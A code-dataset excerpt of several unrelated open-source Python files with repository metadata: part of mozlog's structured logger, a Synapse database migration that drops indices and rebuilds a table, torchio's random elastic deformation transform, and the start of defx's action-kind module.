function if you're using setting up logging that way (recommended).
:param default_logger: The logger to set to default.
"""
global _default_logger_name
_default_logger_name = default_logger.name
log_levels = dict(
(k.upper(), v)
for v, k in enumerate(["critical", "error", "warning", "info", "debug"])
)
lint_levels = ["ERROR", "WARNING"]
def log_actions():
"""Returns the set of actions implemented by mozlog."""
return set(convertor_registry.keys())
class LoggerShutdownError(Exception):
"""Raised when attempting to log after logger.shutdown() has been called."""
class LoggerState(object):
def __init__(self):
self.reset()
def reset(self):
self.handlers = []
self.subsuites = set()
self.running_tests = set()
self.suite_started = False
self.component_states = {}
self.has_shutdown = False
class ComponentState(object):
def __init__(self):
self.filter_ = None
class StructuredLogger(object):
_lock = Lock()
_logger_states = {}
"""Create a structured logger with the given name
:param name: The name of the logger.
:param component: A subcomponent that the logger belongs to (typically a library name)
"""
def __init__(self, name, component=None):
self.name = name
self.component = component
with self._lock:
if name not in self._logger_states:
self._logger_states[name] = LoggerState()
if component not in self._logger_states[name].component_states:
self._logger_states[name].component_states[component] = ComponentState()
self._state = self._logger_states[name]
self._component_state = self._state.component_states[component]
def add_handler(self, handler):
"""Add a handler to the current logger"""
self._state.handlers.append(handler)
def remove_handler(self, handler):
"""Remove a handler from the current logger"""
self._state.handlers.remove(handler)
def reset_state(self):
"""Resets the logger to a brand new state. This means all handlers
are removed, running tests are discarded and components are reset.
"""
self._state.reset()
self._component_state = self._state.component_states[
self.component
] = ComponentState()
def send_message(self, topic, command, *args):
"""Send a message to each handler configured for this logger. This
part of the api is useful to those users requiring dynamic control
of a handler's behavior.
:param topic: The name used by handlers to subscribe to a message.
:param command: The name of the command to issue.
:param args: Any arguments known to the target for specialized
behavior.
"""
rv = []
for handler in self._state.handlers:
if hasattr(handler, "message_handler"):
rv += handler.message_handler.handle_message(topic, command, *args)
return rv
@property
def handlers(self):
"""A list of handlers that will be called when a
message is logged from this logger"""
return self._state.handlers
@property
def component_filter(self):
return self._component_state.filter_
@component_filter.setter
def component_filter(self, value):
self._component_state.filter_ = value
def log_raw(self, raw_data):
if "action" not in raw_data:
raise ValueError
action = raw_data["action"]
converted_data = convertor_registry[action].convert_known(**raw_data)
for k, v in raw_data.items():
if (
k not in converted_data and
k not in convertor_registry[action].optional_args
):
converted_data[k] = v
data = self._make_log_data(action, converted_data)
if action in ("test_status", "test_end"):
if (
data["expected"] == data["status"] or
data["status"] == "SKIP" or
"expected" not in raw_data
):
del data["expected"]
if not self._ensure_suite_state(action, data):
return
self._handle_log(data)
def _log_data(self, action, data=None):
if data is None:
data = {}
if data.get("subsuite") and data["subsuite"] not in self._state.subsuites:
self.error(f"Unrecognised subsuite {data['subsuite']}")
return
log_data = self._make_log_data(action, data)
self._handle_log(log_data)
def _handle_log(self, data):
if self._state.has_shutdown:
raise LoggerShutdownError(
"{} action received after shutdown.".format(data["action"])
)
with self._lock:
if self.component_filter:
data = self.component_filter(data)
if data is None:
return
for handler in self.handlers:
try:
handler(data)
except Exception:
# Write the exception details directly to stderr because
# log() would call this method again which is currently locked.
print(
"%s: Failure calling log handler:" % __name__,
file=sys.__stderr__,
)
print(traceback.format_exc(), file=sys.__stderr__)
def _make_log_data(self, action, data):
all_data = {
"action": action,
"time": int(time.time() * 1000),
"thread": current_thread().name,
"pid": current_process().pid,
"source": self.name,
}
if self.component:
all_data["component"] = self.component
all_data.update(data)
return all_data
def _ensure_suite_state(self, action, data):
if action == "suite_start":
if self._state.suite_started:
# limit data to reduce unnecessary log bloat
self.error(
"Got second suite_start message before suite_end. " +
"Logged with data: {}".format(json.dumps(data)[:100])
)
return False
self._state.suite_started = True
elif action == "suite_end":
if not self._state.suite_started:
self.error(
"Got suite_end message before suite_start. " +
"Logged with data: {}".format(json.dumps(data))
)
return False
self._state.suite_started = False
return True
@log_action(
TestList("tests"),
Unicode("name", default=None, optional=True),
Dict(Any, "run_info", default=None, optional=True),
Dict(Any, "version_info", default=None, optional=True),
Dict(Any, "device_info", default=None, optional=True),
Dict(Any, "extra", default=None, optional=True),
)
def suite_start(self, data):
"""Log a suite_start message
:param dict tests: Test identifiers that will be run in the suite, keyed by group name.
:param str name: Optional name to identify the suite.
:param dict run_info: Optional information typically provided by mozinfo.
:param dict version_info: Optional target application version information provided
by mozversion.
:param dict device_info: Optional target device information provided by mozdevice.
"""
if not self._ensure_suite_state("suite_start", data):
return
self._log_data("suite_start", data)
@log_action(
Unicode("name"),
Dict(Any, "run_info", default=None, optional=True),
)
def add_subsuite(self, data):
"""Log a add_subsuite message
:param str name: Name to identify the subsuite.
:param dict run_info: Optional information about the subsuite. This updates the suite run_info.
"""
if data["name"] in self._state.subsuites:
return
run_info = data.get("run_info", {"subsuite": data["name"]})
if "subsuite" not in run_info:
run_info = run_info.copy()
run_info["subsuite"] = data["name"]
data["run_info"] = run_info
self._state.subsuites.add(data["name"])
self._log_data("add_subsuite", data)
@log_action(Dict(Any, "extra", default=None, optional=True))
def suite_end(self, data):
"""Log a suite_end message"""
if not self._ensure_suite_state("suite_end", data):
return
self._state.subsuites.clear()
self._log_data("suite_end", data)
@log_action(
TestId("test"),
Unicode("path", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def test_start(self, data):
"""Log a test_start message
:param test: Identifier of the test that will run.
:param path: Path to test relative to some base (typically the root of
the source tree).
:param subsuite: Optional name of the subsuite to which the test belongs.
"""
if not self._state.suite_started:
self.error(
"Got test_start message before suite_start for test %s" % data["test"]
)
return
test_key = (data.get("subsuite"), data["test"])
if test_key in self._state.running_tests:
self.error("test_start for %s logged while in progress." % data["test"])
return
self._state.running_tests.add(test_key)
self._log_data("test_start", data)
@log_action(
TestId("test"),
Unicode("subtest"),
SubStatus("status"),
SubStatus("expected", default="PASS"),
Unicode("message", default=None, optional=True),
Unicode("stack", default=None, optional=True),
Dict(Any, "extra", default=None, optional=True),
List(SubStatus, "known_intermittent", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def test_status(self, data):
"""
Log a test_status message indicating a subtest result. Tests that
do not have subtests are not expected to produce test_status messages.
:param test: Identifier of the test that produced the result.
:param subtest: Name of the subtest.
:param status: Status string indicating the subtest result
:param expected: Status string indicating the expected subtest result.
:param message: Optional string containing a message associated with the result.
:param stack: Optional stack trace encountered during test execution.
:param extra: Optional suite-specific data associated with the test result.
:param known_intermittent: Optional list of string expected intermittent statuses
:param subsuite: Optional name of the subsuite to which the test belongs.
"""
if data["expected"] == data["status"] or data["status"] == "SKIP":
del data["expected"]
test_key = (data.get("subsuite"), data["test"])
if test_key not in self._state.running_tests:
self.error(
"test_status for %s logged while not in progress. "
"Logged with data: %s" % (data["test"], json.dumps(data))
)
return
self._log_data("test_status", data)
@log_action(
TestId("test"),
Status("status"),
Status("expected", default="OK"),
Unicode("message", default=None, optional=True),
Unicode("stack", default=None, optional=True),
Dict(Any, "extra", default=None, optional=True),
List(Status, "known_intermittent", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def test_end(self, data):
"""
Log a test_end message indicating that a test completed. For tests
with subtests this indicates whether the overall test completed without
errors. For tests without subtests this indicates the test result
directly.
:param test: Identifier of the test that produced the result.
:param status: Status string indicating the test result
:param expected: Status string indicating the expected test result.
        :param message: Optional string containing a message associated with the result.
:param stack: Optional stack trace encountered during test execution.
:param extra: Optional suite-specific data associated with the test result.
:param subsuite: Optional name of the subsuite to which the test belongs.
"""
if data["expected"] == data["status"] or data["status"] == "SKIP":
del data["expected"]
test_key = (data.get("subsuite"), data["test"])
if test_key not in self._state.running_tests:
self.error(
"test_end for %s logged while not in progress. "
"Logged with data: %s" % (data["test"], json.dumps(data))
)
else:
self._state.running_tests.remove(test_key)
self._log_data("test_end", data)
@log_action(
Unicode("process"),
Unicode("data"),
Unicode("command", default=None, optional=True),
TestId("test", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def process_output(self, data):
"""Log output from a managed process.
:param process: A unique identifier for the process producing the output
(typically the pid)
:param data: The output to log
:param command: Optional string representing the full command line used to start
the process.
:param test: Optional ID of the test which the process was running.
:param subsuite: Optional name of the subsuite which the process was running.
"""
self._log_data("process_output", data)
@log_action(
Unicode("process", default=None),
Unicode("signature", default="[Unknown]"),
TestId("test", default=None, optional=True),
Unicode("minidump_path", default=None, optional=True),
Unicode("minidump_extra", default=None, optional=True),
Int("stackwalk_retcode", default=None, optional=True),
Unicode("stackwalk_stdout", default=None, optional=True),
Unicode("stackwalk_stderr", default=None, optional=True),
Unicode("reason", default=None, optional=True),
Unicode("java_stack", default=None, optional=True),
Unicode("process_type", default=None, optional=True),
List(Unicode, "stackwalk_errors", default=None),
Unicode("subsuite", default=None, optional=True),
)
def crash(self, data):
if data["stackwalk_errors"] is None:
data["stackwalk_errors"] = []
self._log_data("crash", data)
@log_action(
Unicode("primary", default=None), List(Unicode, "secondary", default=None)
)
def valgrind_error(self, data):
self._log_data("valgrind_error", data)
@log_action(
Unicode("process"),
Unicode("command", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def process_start(self, data):
"""Log start event of a process.
:param process: A unique identifier for the process producing the
output (typically the pid)
:param command: Optional string representing the full command line used to
start the process.
:param subsuite: Optional name of the subsuite using the process.
"""
self._log_data("process_start", data)
@log_action(
Unicode("process"),
Int("exitcode"),
Unicode("command", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def process_exit(self, data):
"""Log exit event of a process.
:param process: A unique identifier for the process producing the
output (typically the pid)
:param exitcode: the exit code
:param command: Optional string representing the full command line used to
start the process.
:param subsuite: Optional name of the subsuite using the process.
"""
self._log_data("process_exit", data)
@log_action(
TestId("test"),
Int("count"),
Int("min_expected"),
Int("max_expected"),
Unicode("subsuite", default=None, optional=True),
)
def assertion_count(self, data):
"""Log count of assertions produced when running a test.
:param count: Number of assertions produced
:param min_expected: Minimum expected number of assertions
:param max_expected: Maximum expected number of assertions
:param subsuite: Optional name of the subsuite for the tests that ran
"""
self._log_data("assertion_count", data)
@log_action(
List(Unicode, "frames"),
Unicode("scope", optional=True, default=None),
Unicode("allowed_match", optional=True, default=None),
Unicode("subsuite", default=None, optional=True),
)
def lsan_leak(self, data):
self._log_data("lsan_leak", data)
@log_action(
Int("bytes"),
Int("allocations"),
Boolean("allowed", optional=True, default=False),
Unicode("subsuite", default=None, optional=True),
)
def lsan_summary(self, data):
self._log_data("lsan_summary", data)
@log_action(
Unicode("process"),
Int("bytes"),
Unicode("name"),
Unicode("scope", optional=True, default=None),
Boolean("allowed", optional=True, default=False),
Unicode("subsuite", default=None, optional=True),
)
def mozleak_object(self, data):
self._log_data("mozleak_object", data)
@log_action(
Unicode("process"),
Nullable(Int, "bytes"),
Int("threshold"),
List(Unicode, "objects"),
Unicode("scope", optional=True, default=None),
Boolean("induced_crash", optional=True, default=False),
Boolean("ignore_missing", optional=True, default=False),
Unicode("subsuite", default=None, optional=True),
)
def mozleak_total(self, data):
self._log_data("mozleak_total", data)
@log_action()
def shutdown(self, data):
"""Shutdown the logger.
This logs a 'shutdown' action after which any further attempts to use
the logger will raise a :exc:`LoggerShutdownError`.
This is also called implicitly from the destructor or
when exiting the context manager.
"""
self._log_data("shutdown", data)
self._state.has_shutdown = True
def __enter__(self):
return self
def __exit__(self, exc, val, tb):
self.shutdown()
def _log_func(level_name):
@log_action(Unicode("message"), Any("exc_info", default=False))
def log(self, data):
exc_info = data.pop("exc_info", None)
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
if exc_info != (None, None, None):
bt = traceback.format_exception(*exc_info)
data["stack"] = "\n".join(bt)
data["level"] = level_name
self._log_data("log", data)
log.__doc__ = (
"""Log a message with level %s
:param message: The string message to log
:param exc_info: Either a boolean indicating whether to include a traceback
derived from sys.exc_info() or a three-item tuple in the
same format as sys.exc_info() containing exception information
to log.
"""
% level_name
)
log.__name__ = str(level_name).lower()
return log
def _lint_func(level_name):
@log_action(
Unicode("path"),
Unicode("message", default=""),
Int("lineno", default=0),
Int("column", default=None, optional=True),
Unicode("hint", default=None, optional=True),
Unicode("source", default=None, optional=True),
Unicode("rule", default=None, optional=True),
Tuple((Int, Int), "lineoffset", default=None, optional=True),
Unicode("linter", default=None, optional=True),
)
def lint(self, data):
data["level"] = level_name
self._log_data("lint", data)
lint.__doc__ = """Log an error resulting from a failed lint check
:param linter: name of the linter that flagged this error
:param path: path to the file containing the error
:param message: text describing the error
:param lineno: line number that contains the error
:param column: column containing the error
:param hint: suggestion for fixing the error (optional)
:param source: source code context of the error (optional)
:param rule: name of the rule that was violated (optional)
    :param lineoffset: denotes that an error spans multiple lines, of the form
(<lineno offset>, <num lines>) (optional)
"""
lint.__name__ = str("lint_%s" % level_name)
return lint
# Create all the methods on StructuredLog for log/lint levels
for level_name in log_levels:
setattr(StructuredLogger, level_name.lower(), _log_func(level_name))
for level_name in lint_levels:
level_name = level_name.lower()
name = "lint_%s" % level_name
setattr(StructuredLogger, name, _lint_func(level_name))
class StructuredLogFileLike(object):
"""Wrapper for file-like objects to redirect writes to logger
instead. Each call to `write` becomes a single log entry of type `log`.
When using this it is important that the callees i.e. the logging
handlers do not themselves try to write to the wrapped file as this
will cause infinite recursion.
:param logger: `StructuredLogger` to which to redirect the file write operations.
:param level: log level to use for each write.
:param prefix: String prefix to prepend to each log entry.
"""
def __init__(self, logger, level="info", prefix=None):
self.logger = logger
self.log_func = getattr(self.logger, level)
self.prefix = prefix
def write(self, data):
if data.endswith("\n"):
data = data[:-1]
if data.endswith("\r"):
data = data[:-1]
if self.prefix is not None:
data = "%s: %s" % (self.prefix, data)
self.log_func(data)
def flush(self):
pass
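# Illustrative sketch (not part of the original module): redirecting writes
# from a file-like interface through a logger via StructuredLogFileLike. The
# source name and prefix are hypothetical; this helper is never called here.
def _example_file_like_redirect():
    logger = StructuredLogger("example-source")
    logger.add_handler(print)
    wrapped = StructuredLogFileLike(logger, level="info", prefix="stdout")
    wrapped.write("hello from the wrapped stream\n")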
|
9df3dd6f0ad7d760a1b1a19f44c67c91a81c2458
|
7343ece3b82ac87a594865c4074623b45b0297b4
|
/synapse/storage/schema/main/delta/37/remove_auth_idx.py
|
d672f9b43cdf21098334fd65d26faab4558e90de
|
[
"Apache-2.0"
] |
permissive
|
matrix-org/synapse
|
a00111f83310783b78e2996557f8bbae4d9fb229
|
d35bed8369514fe727b4fe1afb68f48cc8b2655a
|
refs/heads/develop
| 2023-09-05T05:24:20.808942
| 2023-09-04T16:14:09
| 2023-09-04T16:14:09
| 22,844,864
| 12,215
| 2,869
|
Apache-2.0
| 2023-09-14T15:20:48
| 2014-08-11T15:51:42
|
Python
|
UTF-8
|
Python
| false
| false
| 2,682
|
py
|
remove_auth_idx.py
|
# Copyright 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from synapse.storage.database import LoggingTransaction
from synapse.storage.engines import BaseDatabaseEngine, PostgresEngine
from synapse.storage.prepare_database import get_statements
logger = logging.getLogger(__name__)
DROP_INDICES = """
-- We only ever query based on event_id
DROP INDEX IF EXISTS state_events_room_id;
DROP INDEX IF EXISTS state_events_type;
DROP INDEX IF EXISTS state_events_state_key;
-- room_id is indexed elsewhere
DROP INDEX IF EXISTS current_state_events_room_id;
DROP INDEX IF EXISTS current_state_events_state_key;
DROP INDEX IF EXISTS current_state_events_type;
DROP INDEX IF EXISTS transactions_have_ref;
-- (topological_ordering, stream_ordering, room_id) seems like a strange index,
-- and is used incredibly rarely.
DROP INDEX IF EXISTS events_order_topo_stream_room;
-- an equivalent index to this actually gets re-created in delta 41, because it
-- turned out that deleting it wasn't a great plan :/. In any case, let's
-- delete it here, and delta 41 will create a new one with an added UNIQUE
-- constraint
DROP INDEX IF EXISTS event_search_ev_idx;
"""
POSTGRES_DROP_CONSTRAINT = """
ALTER TABLE event_auth DROP CONSTRAINT IF EXISTS event_auth_event_id_auth_id_room_id_key;
"""
SQLITE_DROP_CONSTRAINT = """
DROP INDEX IF EXISTS evauth_edges_id;
CREATE TABLE IF NOT EXISTS event_auth_new(
event_id TEXT NOT NULL,
auth_id TEXT NOT NULL,
room_id TEXT NOT NULL
);
INSERT INTO event_auth_new
SELECT event_id, auth_id, room_id
FROM event_auth;
DROP TABLE event_auth;
ALTER TABLE event_auth_new RENAME TO event_auth;
CREATE INDEX evauth_edges_id ON event_auth(event_id);
"""
def run_create(cur: LoggingTransaction, database_engine: BaseDatabaseEngine) -> None:
for statement in get_statements(DROP_INDICES.splitlines()):
cur.execute(statement)
if isinstance(database_engine, PostgresEngine):
drop_constraint = POSTGRES_DROP_CONSTRAINT
else:
drop_constraint = SQLITE_DROP_CONSTRAINT
for statement in get_statements(drop_constraint.splitlines()):
cur.execute(statement)
|
1c350af4e92696933bf6a47dc5f5d05da0f987f4
|
8b12d44618a870d0b4d11719928035f52930093f
|
/src/torchio/transforms/augmentation/spatial/random_elastic_deformation.py
|
b3aa698407e2e2ed18ecc77cd785e64e888a121d
|
[
"Apache-2.0"
] |
permissive
|
fepegar/torchio
|
a37635dbdaea5b2f797e3975a1e74c39049a9874
|
97232165c74061b0fe9e018c5377cb3ed63d67fe
|
refs/heads/main
| 2023-09-01T13:41:52.838197
| 2023-08-03T11:49:37
| 2023-08-03T11:49:37
| 224,148,738
| 1,831
| 239
|
Apache-2.0
| 2023-09-11T17:03:52
| 2019-11-26T09:10:09
|
Python
|
UTF-8
|
Python
| false
| false
| 14,122
|
py
|
random_elastic_deformation.py
|
import warnings
from numbers import Number
from typing import Sequence
from typing import Tuple
from typing import Union
import numpy as np
import SimpleITK as sitk
import torch
from .. import RandomTransform
from ... import SpatialTransform
from ....data.image import ScalarImage
from ....data.io import nib_to_sitk
from ....data.subject import Subject
from ....typing import TypeTripletFloat
from ....typing import TypeTripletInt
from ....utils import to_tuple
SPLINE_ORDER = 3
class RandomElasticDeformation(RandomTransform, SpatialTransform):
r"""Apply dense random elastic deformation.
A random displacement is assigned to a coarse grid of control points around
and inside the image. The displacement at each voxel is interpolated from
the coarse grid using cubic B-splines.
The `'Deformable Registration' <https://www.sciencedirect.com/topics/computer-science/deformable-registration>`_
topic on ScienceDirect contains useful articles explaining interpolation of
displacement fields using cubic B-splines.
.. warning:: This transform is slow as it requires expensive computations.
If your images are large you might want to use
:class:`~torchio.transforms.RandomAffine` instead.
Args:
num_control_points: Number of control points along each dimension of
the coarse grid :math:`(n_x, n_y, n_z)`.
If a single value :math:`n` is passed,
then :math:`n_x = n_y = n_z = n`.
Smaller numbers generate smoother deformations.
The minimum number of control points is ``4`` as this transform
uses cubic B-splines to interpolate displacement.
max_displacement: Maximum displacement along each dimension at each
control point :math:`(D_x, D_y, D_z)`.
The displacement along dimension :math:`i` at each control point is
:math:`d_i \sim \mathcal{U}(0, D_i)`.
If a single value :math:`D` is passed,
then :math:`D_x = D_y = D_z = D`.
Note that the total maximum displacement would actually be
:math:`D_{max} = \sqrt{D_x^2 + D_y^2 + D_z^2}`.
locked_borders: If ``0``, all displacement vectors are kept.
If ``1``, displacement of control points at the
border of the coarse grid will be set to ``0``.
If ``2``, displacement of control points at the border of the image
(red dots in the image below) will also be set to ``0``.
image_interpolation: See :ref:`Interpolation`.
Note that this is the interpolation used to compute voxel
intensities when resampling using the dense displacement field.
The value of the dense displacement at each voxel is always
interpolated with cubic B-splines from the values at the control
points of the coarse grid.
label_interpolation: See :ref:`Interpolation`.
**kwargs: See :class:`~torchio.transforms.Transform` for additional
keyword arguments.
`This gist <https://gist.github.com/fepegar/b723d15de620cd2a3a4dbd71e491b59d>`_
can also be used to better understand the meaning of the parameters.
This is an example from the
`3D Slicer registration FAQ <https://www.slicer.org/wiki/Documentation/4.10/FAQ/Registration#What.27s_the_BSpline_Grid_Size.3F>`_.
.. image:: https://www.slicer.org/w/img_auth.php/6/6f/RegLib_BSplineGridModel.png
:alt: B-spline example from 3D Slicer documentation
To generate a similar grid of control points with TorchIO,
the transform can be instantiated as follows::
>>> from torchio import RandomElasticDeformation
>>> transform = RandomElasticDeformation(
... num_control_points=(7, 7, 7), # or just 7
... locked_borders=2,
... )
    Note that control points outside the image bounds are not shown in the
example image (they would also be red as we set :attr:`locked_borders`
to ``2``).
.. warning:: Image folding may occur if the maximum displacement is larger
than half the coarse grid spacing. The grid spacing can be computed
using the image bounds in physical space [#]_ and the number of control
points::
>>> import numpy as np
>>> import torchio as tio
>>> image = tio.datasets.Slicer().MRHead.as_sitk()
>>> image.GetSize() # in voxels
(256, 256, 130)
>>> image.GetSpacing() # in mm
(1.0, 1.0, 1.2999954223632812)
>>> bounds = np.array(image.GetSize()) * np.array(image.GetSpacing())
>>> bounds # mm
array([256. , 256. , 168.99940491])
>>> num_control_points = np.array((7, 7, 6))
>>> grid_spacing = bounds / (num_control_points - 2)
>>> grid_spacing
array([51.2 , 51.2 , 42.24985123])
>>> potential_folding = grid_spacing / 2
>>> potential_folding # mm
array([25.6 , 25.6 , 21.12492561])
Using a :attr:`max_displacement` larger than the computed
:attr:`potential_folding` will raise a :class:`RuntimeWarning`.
.. [#] Technically, :math:`2 \epsilon` should be added to the
image bounds, where :math:`\epsilon = 2^{-3}` `according to ITK
source code <https://github.com/InsightSoftwareConsortium/ITK/blob/633f84548311600845d54ab2463d3412194690a8/Modules/Core/Transform/include/itkBSplineTransformInitializer.hxx#L116-L138>`_.
""" # noqa: B950
def __init__(
self,
num_control_points: Union[int, Tuple[int, int, int]] = 7,
max_displacement: Union[float, Tuple[float, float, float]] = 7.5,
locked_borders: int = 2,
image_interpolation: str = 'linear',
label_interpolation: str = 'nearest',
**kwargs,
):
super().__init__(**kwargs)
self._bspline_transformation = None
self.num_control_points = to_tuple(num_control_points, length=3)
_parse_num_control_points(self.num_control_points) # type: ignore[arg-type] # noqa: B950
self.max_displacement = to_tuple(max_displacement, length=3)
_parse_max_displacement(self.max_displacement) # type: ignore[arg-type] # noqa: B950
self.num_locked_borders = locked_borders
if locked_borders not in (0, 1, 2):
raise ValueError('locked_borders must be 0, 1, or 2')
if locked_borders == 2 and 4 in self.num_control_points:
message = (
                'Setting locked_borders to 2 and using less than 5 control'
                ' points results in an identity transform. Lock fewer borders'
' or use more control points.'
)
raise ValueError(message)
self.image_interpolation = self.parse_interpolation(
image_interpolation,
)
self.label_interpolation = self.parse_interpolation(
label_interpolation,
)
@staticmethod
def get_params(
num_control_points: TypeTripletInt,
max_displacement: Tuple[float, float, float],
num_locked_borders: int,
) -> np.ndarray:
grid_shape = num_control_points
num_dimensions = 3
coarse_field = torch.rand(*grid_shape, num_dimensions) # [0, 1)
coarse_field -= 0.5 # [-0.5, 0.5)
coarse_field *= 2 # [-1, 1]
for dimension in range(3):
# [-max_displacement, max_displacement)
coarse_field[..., dimension] *= max_displacement[dimension]
# Set displacement to 0 at the borders
for i in range(num_locked_borders):
coarse_field[i, :] = 0
coarse_field[-1 - i, :] = 0
coarse_field[:, i] = 0
coarse_field[:, -1 - i] = 0
return coarse_field.numpy()
def apply_transform(self, subject: Subject) -> Subject:
subject.check_consistent_spatial_shape()
control_points = self.get_params(
self.num_control_points, # type: ignore[arg-type]
self.max_displacement, # type: ignore[arg-type]
self.num_locked_borders,
)
arguments = {
'control_points': control_points,
'max_displacement': self.max_displacement,
'image_interpolation': self.image_interpolation,
'label_interpolation': self.label_interpolation,
}
transform = ElasticDeformation(**self.add_include_exclude(arguments))
transformed = transform(subject)
assert isinstance(transformed, Subject)
return transformed
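# Illustrative sketch (not part of the original module): the coarse displacement
# field produced by RandomElasticDeformation.get_params is a NumPy array of
# shape (n_x, n_y, n_z, 3), with each entry bounded by the corresponding
# max_displacement. The parameter values below are hypothetical.
def _example_coarse_field() -> np.ndarray:
    field = RandomElasticDeformation.get_params(
        num_control_points=(7, 7, 7),
        max_displacement=(7.5, 7.5, 7.5),
        num_locked_borders=2,
    )
    assert field.shape == (7, 7, 7, 3)
    return field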
class ElasticDeformation(SpatialTransform):
r"""Apply dense elastic deformation.
Args:
control_points:
max_displacement:
image_interpolation: See :ref:`Interpolation`.
label_interpolation: See :ref:`Interpolation`.
**kwargs: See :class:`~torchio.transforms.Transform` for additional
keyword arguments.
"""
def __init__(
self,
control_points: np.ndarray,
max_displacement: TypeTripletFloat,
image_interpolation: str = 'linear',
label_interpolation: str = 'nearest',
**kwargs,
):
super().__init__(**kwargs)
self.control_points = control_points
self.max_displacement = max_displacement
self.image_interpolation = self.parse_interpolation(
image_interpolation,
)
self.label_interpolation = self.parse_interpolation(
label_interpolation,
)
self.invert_transform = False
self.args_names = [
'control_points',
'image_interpolation',
'label_interpolation',
'max_displacement',
]
def get_bspline_transform(
self,
image: sitk.Image,
) -> sitk.BSplineTransform:
control_points = self.control_points.copy()
if self.invert_transform:
control_points *= -1
is_2d = image.GetSize()[2] == 1
if is_2d:
control_points[..., -1] = 0 # no displacement in IS axis
num_control_points = control_points.shape[:-1]
mesh_shape = [n - SPLINE_ORDER for n in num_control_points]
bspline_transform = sitk.BSplineTransformInitializer(image, mesh_shape)
parameters = control_points.flatten(order='F').tolist()
bspline_transform.SetParameters(parameters)
return bspline_transform
@staticmethod
def parse_free_form_transform(
transform: sitk.BSplineTransform,
max_displacement: Sequence[TypeTripletInt],
) -> None:
"""Issue a warning is possible folding is detected."""
coefficient_images = transform.GetCoefficientImages()
grid_spacing = coefficient_images[0].GetSpacing()
conflicts = np.array(max_displacement) > np.array(grid_spacing) / 2
if np.any(conflicts):
(where,) = np.where(conflicts)
message = (
'The maximum displacement is larger than the coarse grid'
f' spacing for dimensions: {where.tolist()}, so folding may'
' occur. Choose fewer control points or a smaller'
' maximum displacement'
)
warnings.warn(message, RuntimeWarning, stacklevel=2)
def apply_transform(self, subject: Subject) -> Subject:
no_displacement = not any(self.max_displacement)
if no_displacement:
return subject
subject.check_consistent_spatial_shape()
for image in self.get_images(subject):
if not isinstance(image, ScalarImage):
interpolation = self.label_interpolation
else:
interpolation = self.image_interpolation
transformed = self.apply_bspline_transform(
image.data,
image.affine,
interpolation,
)
image.set_data(transformed)
return subject
def apply_bspline_transform(
self,
tensor: torch.Tensor,
affine: np.ndarray,
interpolation: str,
) -> torch.Tensor:
assert tensor.dim() == 4
results = []
for component in tensor:
image = nib_to_sitk(component[np.newaxis], affine, force_3d=True)
floating = reference = image
bspline_transform = self.get_bspline_transform(image)
self.parse_free_form_transform(
bspline_transform,
self.max_displacement, # type: ignore[arg-type]
)
interpolator = self.get_sitk_interpolator(interpolation)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(reference)
resampler.SetTransform(bspline_transform)
resampler.SetInterpolator(interpolator)
resampler.SetDefaultPixelValue(component.min().item())
resampler.SetOutputPixelType(sitk.sitkFloat32)
resampled = resampler.Execute(floating)
result, _ = self.sitk_to_nib(resampled)
results.append(torch.as_tensor(result))
tensor = torch.cat(results)
return tensor
def _parse_num_control_points(
num_control_points: TypeTripletInt,
) -> None:
for axis, number in enumerate(num_control_points):
if not isinstance(number, int) or number < 4:
message = (
f'The number of control points for axis {axis} must be'
f' an integer greater than 3, not {number}'
)
raise ValueError(message)
def _parse_max_displacement(
max_displacement: Tuple[float, float, float],
) -> None:
for axis, number in enumerate(max_displacement):
if not isinstance(number, Number) or number < 0:
message = (
'The maximum displacement at each control point'
f' for axis {axis} must be'
f' a number greater or equal to 0, not {number}'
)
raise ValueError(message)
|
bce003c6e9d45075e6e291e619ef4990d31a2843
|
aba5caebbaea79f798c063db4386ebe040a62d54
|
/rplugin/python3/defx/base/kind.py
|
36dd8140d224adf1a5d2d2f4b6dc08937a58854b
|
[
"MIT"
] |
permissive
|
Shougo/defx.nvim
|
9aeb30f2208043228a64c3b661fae0b98cb2c827
|
eb66962f7b9f7a4d23a1e0be122b45a88331dffa
|
refs/heads/master
| 2023-08-16T23:03:51.817726
| 2023-04-25T09:56:56
| 2023-04-25T09:56:56
| 77,885,726
| 1,336
| 144
|
NOASSERTION
| 2022-03-01T00:49:13
| 2017-01-03T05:07:46
|
Python
|
UTF-8
|
Python
| false
| false
| 15,131
|
py
|
kind.py
|
# ============================================================================
# FILE: kind.py
# AUTHOR: Shougo Matsushita <Shougo.Matsu at gmail.com>
# License: MIT license
# ============================================================================
from pathlib import Path
from pynvim import Nvim
import json
import re
import inspect
import typing
from functools import wraps, partial
from defx.action import ActionAttr
from defx.action import ActionTable
from defx.action import do_action
from defx.clipboard import ClipboardAction
from defx.context import Context
from defx.defx import Defx
from defx.session import Session
from defx.view import View
Kind = typing.Any
ACTION_FUNC = typing.Callable[[Kind, View, Defx, Context], None]
class ActionFunc:
def __init__(self, name: str, attr: ActionAttr, func: ACTION_FUNC):
self._is_action = True
self._name = name
self._attr = attr
self._func = func
def __call__(self, kind: Kind, view: View, defx: Defx,
context: Context) -> None:
return self._func(kind, view, defx, context)
def action(name: str, attr: ActionAttr = ActionAttr.NONE
) -> typing.Callable[[ACTION_FUNC], ACTION_FUNC]:
def wrapper(func: ACTION_FUNC) -> ACTION_FUNC:
f = ActionFunc(name, attr, func)
@wraps(f)
def inner_wrapper(kind: Kind, view: View, defx: Defx,
context: Context) -> None:
return f(kind, view, defx, context)
return inner_wrapper
return wrapper
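# Note (added for exposition): functools.wraps copies the ActionFunc instance's
# __dict__ (_is_action, _name, _attr, _func) onto inner_wrapper, which is what
# Base.get_actions() below relies on to discover decorated methods. A custom
# kind therefore only needs to mark its methods with @action; a hypothetical
# example subclass is sketched at the end of this module.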
class Base:
def __init__(self, vim: Nvim) -> None:
self.vim = vim
self.name = 'base'
